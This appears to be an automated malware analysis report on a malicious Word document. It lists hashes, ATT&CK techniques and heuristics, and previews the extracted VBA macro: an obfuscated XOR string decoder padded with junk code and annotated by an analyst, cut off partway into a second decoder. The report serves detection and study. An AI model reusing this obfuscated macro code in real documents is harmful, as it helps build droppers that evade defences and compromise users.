Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a67af09519d01cdb…

MALICIOUS

Office (OLE)

85.5 KB | Created: 2018-06-21 11:36:00 | Authoring application: Microsoft Office Word | First seen: 2019-05-31
MD5: ed08f56f55df0c755d2f465d34e828da SHA-1: 223050ff01a9f7be65982f11083783690477f180 SHA-256: a67af09519d01cdbc850a93c3237576ce42841d8e2565102e4925c46e3dbfdeb
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic; T1566.001 Spearphishing Attachment; T1047 WMI

The sample is a malicious Office document containing a VBA macro. The AutoClose macro is configured to execute when the document is closed, and it calls CreateObject, which indicates an intent to run arbitrary code. This macro is likely designed to download and execute a second-stage payload, a common technique for initial compromise.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 84866 bytes
SHA-256: 6a0417aab020bfe96c4dc5488e96d09c96b654e6e0dbb05f0214ab1e4e234b02
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' The lines above are the exported module attributes of the document's
' ThisDocument class module; no procedure body is shown for it in this
' preview. The line below starts a second, separately named standard
' module (K6Rd0c) whose procedures follow. No "Option Explicit" appears
' before its first procedure, which is why undeclared loop variables can
' be used in the code that follows.
Attribute VB_Name = "K6Rd0c"
' Decoder routine recovered from module K6Rd0c of the sample.
' What the code below does: converts LOtowdOn and Ba1ryOA to byte arrays,
' XORs every byte of LOtowdOn with the bytes of Ba1ryOA used as a repeating
' key (key index wraps back to 0 after its last element), and returns the
' result converted back to a String.
'   LOtowdOn - ByRef String: the data to decode (converted with vbFromUnicode).
'   Ba1ryOA  - ByVal String: the key (converted with vbFromUnicode).
'   Returns  - the XOR'd byte array converted with vbUnicode.
' Most of the body is padding: loops that sum small constant ranges into
' variables never read, Dims inside always-false/always-true If blocks, and
' Application.UserName comparisons against random-looking literals that
' only show a MsgBox on a match. None of it changes the return value; the
' lines that matter are marked "REAL" below. Several loop counters
' (sKq83lH1, KorHlBvB1, vP6xWLVe6, eJuXsP, ...) are never declared, so the
' module must be compiled without Option Explicit.
Public Function Zv9gHIn(ByRef LOtowdOn As String, ByVal Ba1ryOA As String) As String
Dim nCpp5tPyRY() As Byte
Dim xUg26cV() As Byte
Dim Ckxz1pzTqI As Long
' VBA quirk: in "Dim a, b As Integer" only b is Integer; a is Variant.
Dim MTh9ek2S, X50Db3kKP As Integer
' --- padding: X50Db3kKP ends as 45, sKq83lH1 as 10, so the If is false ---
MTh9ek2S = 5 + 8
For sKq83lH1 = 0 To 9
X50Db3kKP = X50Db3kKP + sKq83lH1
Next sKq83lH1
If X50Db3kKP < sKq83lH1 Then
Dim SDxqMow7 As Long
End If
' --- padding: UserName check; the Else branch copies it to an unused local ---
If Application.UserName = "JYVtK1IcjkI" Then
MsgBox ("IOOGqaCUMPS")
Else
Dim DpZyY06As2UemJ As String
DpZyY06As2UemJ = Application.UserName
End If
' PQvjP4d is REAL (last index of the key array); TtREiA is padding.
Dim PQvjP4d As Long
Dim TtREiA As Long
For p7UOT4 = 8 To 13
TtREiA = TtREiA + p7UOT4
Next p7UOT4
If Len(Application.UserName) < 577 Then
Dim e94LaST As Collection
End If
' REAL: KPNAz9Iajq8 is the data index, EmGHO7Uska the key index (starts at 0).
Dim KPNAz9Iajq8 As Long
Dim EmGHO7Uska As Long
If Len(Application.UserName) < 631 Then
Dim deU7SUg8E1 As Collection
End If
' REAL: data string -> byte array; Ckxz1pzTqI = its last index.
nCpp5tPyRY = StrConv(LOtowdOn, vbFromUnicode)
Ckxz1pzTqI = UBound(nCpp5tPyRY)
' --- padding: builds "hhhhhhhhh" and never uses it ---
Dim WkBWzIHHT0 As String
For eqSiXuy4 = 0 To 8
WkBWzIHHT0 = WkBWzIHHT0 + "h"
Next eqSiXuy4
Dim iYnKNBOp, k3V7vY As Integer
iYnKNBOp = 5 + 8
For swpwpg3Qr = 0 To 8
k3V7vY = k3V7vY + swpwpg3Qr
Next swpwpg3Qr
If k3V7vY < swpwpg3Qr Then
Dim LqPRqXDbN As Long
End If
For Elc6b5j4 = 0 To 5
KorHlBvB1 = KorHlBvB1 + Elc6b5j4
Next Elc6b5j4
If Application.UserName = "h0GpnSuYOIk" Then
MsgBox ("Fm1CzzNrug5")
Else
Dim lb0b6IWkd1RS7h As String
lb0b6IWkd1RS7h = Application.UserName
End If
' REAL: key string -> byte array.
xUg26cV = StrConv(Ba1ryOA, vbFromUnicode)
' --- padding: builds "DDDDDDDDD" and never uses it ---
Dim DUzVvkdN As String
For CbWUrQfm8e = 0 To 8
DUzVvkdN = DUzVvkdN + "D"
Next CbWUrQfm8e
Dim ZgdTDgrTdn, asfveoPz As Integer
ZgdTDgrTdn = 6 + 6
For P9W6vrmD = 0 To 8
asfveoPz = asfveoPz + P9W6vrmD
Next P9W6vrmD
If asfveoPz < P9W6vrmD Then
Dim SejXH7 As Long
End If
' REAL: last index of the key array. Not guarded: an empty Ba1ryOA
' presumably yields an array with no elements and the Xor below would
' fail with a subscript error — TODO confirm.
PQvjP4d = UBound(xUg26cV)
Dim DAsx3txkU6 As Long
For QA50NsSeR4 = 6 To 13
DAsx3txkU6 = DAsx3txkU6 + QA50NsSeR4
Next QA50NsSeR4
If Len(Application.UserName) < 496 Then
Dim DU3TzoOLx As Collection
End If
If Application.UserName = "Pu1o1e0TeZn" Then
MsgBox ("yrH6ytfMotb")
Else
Dim RZAZj3xKs9LPiy As String
RZAZj3xKs9LPiy = Application.UserName
End If
' REAL: main loop over every data byte (no iterations when the data is empty).
For KPNAz9Iajq8 = 0 To Ckxz1pzTqI
If Application.UserName = "DMYlmfLymNq" Then
MsgBox ("DDiHBaI0w3T")
Else
Dim eZMi2r9Nqzx2Sx As String
eZMi2r9Nqzx2Sx = Application.UserName
End If
' REAL: in-place XOR of the current data byte with the current key byte.
nCpp5tPyRY(KPNAz9Iajq8) = nCpp5tPyRY(KPNAz9Iajq8) Xor xUg26cV(EmGHO7Uska)
Dim VOVEXoM As Long
For kKZwvAJt29 = 7 To 15
VOVEXoM = VOVEXoM + kKZwvAJt29
Next kKZwvAJt29
' REAL: advance the key index, wrapping to 0 after the last key byte
' (the inner loops and the UserName check in both branches are padding).
If EmGHO7Uska < PQvjP4d Then
For dL11qujk8 = 0 To 8
vP6xWLVe6 = vP6xWLVe6 + dL11qujk8
Next dL11qujk8
EmGHO7Uska = EmGHO7Uska + 1
Else
If Application.UserName = "wya6IshdhE0" Then
MsgBox ("ffZzab0V5QC")
Else
Dim S0nMHb2zilm2LV As String
S0nMHb2zilm2LV = Application.UserName
End If
EmGHO7Uska = 0
End If
Dim gcQtGvLxR As Long
For SENkiV = 9 To 16
gcQtGvLxR = gcQtGvLxR + SENkiV
Next SENkiV
If Len(Application.UserName) < 533 Then
Dim BdryWL2a As Collection
End If
Next KPNAz9Iajq8
' --- padding: two more UserName checks with no effect on the result ---
If Application.UserName = "v1KsJp49ppy" Then
MsgBox ("iDYzJ3F292b")
Else
Dim uDeXEVjiFU57rU As String
uDeXEVjiFU57rU = Application.UserName
End If
If Application.UserName = "E5Dn8DzNhqn" Then
MsgBox ("X6o3dohc3MB")
Else
Dim UvL0sHj5PSEcoi As String
UvL0sHj5PSEcoi = Application.UserName
End If
' REAL: decoded bytes back to a String; this is the return value.
Zv9gHIn = StrConv(nCpp5tPyRY, vbUnicode)
' --- padding after the result is set; nothing below changes it ---
For r6q0b3f = 0 To 5
eJuXsP = eJuXsP + r6q0b3f
Next r6q0b3f
Dim RfLnjZG As String
For jpEame2Z = 0 To 8
RfLnjZG = RfLnjZG + "A"
Next jpEame2Z
End Function
Public Function EqEXXq(ByVal THREE As String) As Byte()
   Dim VZtk5URQz6 As Integer, XvDvl0c7PY As Integer, SAgFI45dh(0 To 63) As Byte, RulVA7FK(0 To 127) As Byte
If Application.UserName = "BIcOdsdrqiB" Then
MsgBox ("t0kNp7servP")
Else
Dim ULfm6J6e3koCME As String
ULfm6J6e3koCME = Application.UserName
End If
If Application.UserName
... (truncated)